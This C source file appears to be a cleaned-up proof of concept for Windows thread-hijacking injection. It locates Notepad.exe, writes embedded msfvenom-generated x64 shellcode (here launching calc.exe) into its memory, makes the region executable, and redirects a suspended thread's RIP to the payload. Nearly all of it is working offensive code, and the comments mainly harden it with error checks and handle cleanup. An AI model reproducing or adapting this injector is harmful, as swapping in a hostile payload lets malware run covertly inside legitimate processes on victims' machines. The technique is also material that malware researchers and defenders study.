#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <stdlib.h>
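/*
 * Looks up the PID of the first running process whose image name matches
 * exeName (case-insensitive, via _wcsicmp) in a Toolhelp process snapshot.
 *
 * Builds with UNICODE defined, as the original did: PROCESSENTRY32::szExeFile
 * is a WCHAR[] there, which is what _wcsicmp and the L"" literal require.
 *
 * Returns the PID, or 0 when the snapshot could not be taken or no process
 * matched. 0 is chosen because it is never a usable injection target
 * (OpenProcess refuses it), unlike the old EXIT_FAILURE (== 1) sentinel,
 * which looked like a real PID to the caller.
 */
static DWORD findProcessByName(const WCHAR *exeName) {
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        /* GetLastError() is a DWORD (unsigned long): %lu, not %ld. */
        printf("[!] Failed to create a snapshot! Exiting with error: %lu\n", GetLastError());
        printf("[!] Failed to enum process.\n");
        return 0;
    }
    printf("[*] Snapshot taken successfully for process enum!\n");

    DWORD pid = 0;
    PROCESSENTRY32 pe32 = { 0 };
    pe32.dwSize = sizeof(PROCESSENTRY32);

    /* Process32First already yields the first entry; the original loop
     * discarded it by only examining Process32Next results. do/while
     * inspects every entry exactly once. */
    if (Process32First(hSnapshot, &pe32)) {
        do {
            if (_wcsicmp(pe32.szExeFile, exeName) == 0) {
                pid = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnapshot, &pe32));
    }

    /* The original returned straight out of the loop and leaked the snapshot
     * handle; close it on every path. */
    CloseHandle(hSnapshot);
    return pid;
}

/*
 * Returns the PID of the first "Notepad.exe" process found, or 0 if none is
 * running (or the process snapshot failed). The caller must treat 0 as
 * "no target"; the original fell off the end of the function without a
 * return value when no match was found (undefined behaviour) and returned
 * EXIT_FAILURE on snapshot failure.
 */
DWORD getPID() {
    return findProcessByName(L"Notepad.exe");
}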
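/*
 * Opens a handle (THREAD_ALL_ACCESS) to a thread owned by pid, taken from a
 * Toolhelp thread snapshot. Threads are visited in snapshot order, so the
 * one chosen is not necessarily the process's main thread; if OpenThread
 * fails for one thread the next matching thread is tried.
 *
 * On success returns the thread handle and stores its TID in *tidOut (when
 * tidOut is non-NULL). Returns NULL when the snapshot fails or no thread of
 * pid could be opened. The snapshot handle is closed on every path (the
 * original leaked it).
 */
static HANDLE openFirstThreadOf(DWORD pid, DWORD *tidOut) {
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        printf("[!] Failed to create snapshot for thread enum! Exiting with error: %lu\n", GetLastError());
        return NULL;
    }
    printf("[*] Snapshot taken successfully for thread enum.\n");

    HANDLE hThread = NULL;
    THREADENTRY32 te32 = { 0 };
    te32.dwSize = sizeof(THREADENTRY32);

    /* Thread32First fills the first entry; the original ignored it and only
     * looked at Thread32Next results, skipping one thread. */
    if (Thread32First(hSnapshot, &te32)) {
        do {
            if (te32.th32OwnerProcessID != pid) {
                continue;
            }
            hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
            if (hThread != NULL) {
                if (tidOut != NULL) {
                    *tidOut = te32.th32ThreadID;
                }
                break;
            }
            printf("[!] OpenThread failed for TID %lu (error %lu), trying next thread.\n",
                   te32.th32ThreadID, GetLastError());
        } while (Thread32Next(hSnapshot, &te32));
    }
    CloseHandle(hSnapshot);

    if (hThread == NULL) {
        printf("[!] No thread of PID %lu could be opened.\n", pid);
    }
    return hThread;
}

/*
 * Copies len bytes from buf into freshly allocated memory in hProcess and
 * makes that region PAGE_EXECUTE_READ.
 *
 * Order is allocate RW -> write -> protect RX. The original changed the
 * protection to RX *before* writing, which only worked because
 * WriteProcessMemory silently flips a non-writable page to writable and
 * back; writing first avoids that extra protection round-trip and matches
 * the "from PAGE_READWRITE to PAGE_EXECUTE_READ" message.
 *
 * Returns the remote base address, or NULL on failure (the allocation is
 * released before returning NULL so nothing is left behind in the target).
 */
static LPVOID stageShellcode(HANDLE hProcess, const unsigned char *buf, SIZE_T len) {
    LPVOID remote = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (remote == NULL) {
        printf("[!] Failed to allocate memory. Exiting with error: %lu\n", GetLastError());
        return NULL;
    }
    printf("[+] Allocated memory for the shellcode.\n\t\\----0x%p\n", remote);

    SIZE_T written = 0;
    if (!WriteProcessMemory(hProcess, remote, buf, len, &written) || written != len) {
        printf("[!] Failed to write shellcode into memory! Exiting with error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remote, 0, MEM_RELEASE);
        return NULL;
    }
    /* Print the *remote* address; the original printed the local buffer. */
    printf("[+] Shellcode written into memory.\n\t\\----0x%p\n", remote);

    DWORD oldProtect = 0; /* DWORD, so 0 rather than the pointer constant NULL */
    if (!VirtualProtectEx(hProcess, remote, len, PAGE_EXECUTE_READ, &oldProtect)) {
        printf("[!] Failed to change memory protection. Exiting with error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remote, 0, MEM_RELEASE);
        return NULL;
    }
    printf("[+] Memory protection change from PAGE_READWRITE to PAGE_EXECUTE_READ\n");
    return remote;
}

/*
 * Classic thread hijacking PoC: locate Notepad.exe, stage the embedded
 * payload in its address space, suspend one of its threads, point that
 * thread's RIP at the payload and resume it.
 *
 * Notes for the reader:
 *  - context.Rip exists only in the x64 CONTEXT, so this is a 64-bit-only
 *    build; the payload bytes also look like x64 msfvenom output
 *    (starts with cld / and rsp,-16), though that is not verified here.
 *  - The hijacked thread's original register state is never restored, so
 *    that thread does not return to whatever it was doing; what happens
 *    after the payload finishes depends entirely on the payload's exit
 *    routine (msfvenom's EXITFUNC), which this file does not control.
 *  - Every Win32 call is now checked and all handles are closed; the
 *    original ignored OpenThread/SuspendThread/Get/SetThreadContext/
 *    ResumeThread failures and leaked every handle it opened.
 *
 * Returns EXIT_SUCCESS when the thread was resumed at the payload,
 * EXIT_FAILURE otherwise.
 */
int main() {
    DWORD PID = getPID();
    /* PID 0 (System Idle) is never a valid target; any other bogus value
     * getPID() might hand back is caught by OpenProcess below. */
    if (PID == 0) {
        printf("[!] Target process [Notepad.exe] not found.\n");
        return EXIT_FAILURE;
    }
    printf("[+] PID of target process [Notepad.exe] is %lu\n", PID);

    //shellcode for calc.exe generated using msfvenom
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

    /* Open the process first so a bad PID is rejected before any thread is
     * touched (the original suspended a thread before checking the PID). */
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (hProcess == NULL) {
        printf("[!] Failed to open an handle to target process. Exiting with error: %lu\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Got an handle to target process.\n");

    DWORD tid = 0;
    HANDLE hThreadHijacked = openFirstThreadOf(PID, &tid);
    if (hThreadHijacked == NULL) {
        CloseHandle(hProcess);
        return EXIT_FAILURE;
    }
    printf("[+] TID of target thread is %lu\n", tid);

    int rc = EXIT_FAILURE;
    /* do/while(0) gives a single break-to-cleanup path without goto, which
     * C++ forbids across the initialised locals below. */
    do {
        /* SuspendThread returns (DWORD)-1 on failure, not 0. */
        if (SuspendThread(hThreadHijacked) == (DWORD)-1) {
            printf("[!] Failed to suspend target thread. Exiting with error: %lu\n", GetLastError());
            break;
        }

        LPVOID remote = stageShellcode(hProcess, shellcode, sizeof(shellcode));
        if (remote == NULL) {
            ResumeThread(hThreadHijacked); /* leave the target runnable */
            break;
        }

        /* CONTEXT is 16-byte aligned by its declaration in winnt.h; the
         * flags must be set before GetThreadContext so the register set
         * (including Rip) is filled in. */
        CONTEXT context = { 0 };
        context.ContextFlags = CONTEXT_FULL;
        if (!GetThreadContext(hThreadHijacked, &context)) {
            printf("[!] Failed to get thread context. Exiting with error: %lu\n", GetLastError());
            ResumeThread(hThreadHijacked);
            break;
        }
        printf("[*] Getting the context of hijacked thread.\n");

        context.Rip = (DWORD_PTR)remote;
        if (!SetThreadContext(hThreadHijacked, &context)) {
            printf("[!] Failed to set thread context. Exiting with error: %lu\n", GetLastError());
            ResumeThread(hThreadHijacked); /* context unchanged, thread resumes its own work */
            break;
        }
        printf("[+] Changed the context of hijacked thread.\n");

        if (ResumeThread(hThreadHijacked) == (DWORD)-1) {
            printf("[!] Failed to resume target thread. Exiting with error: %lu\n", GetLastError());
            break;
        }
        printf("[+] Executed the hijacked thread!\n");
        /* Nothing here observes the payload; this only means the thread was
         * resumed with RIP pointing at it. */
        printf("[+] Shellcode executed successfully!\n");
        rc = EXIT_SUCCESS;
    } while (0);

    CloseHandle(hThreadHijacked);
    CloseHandle(hProcess);
    return rc;
}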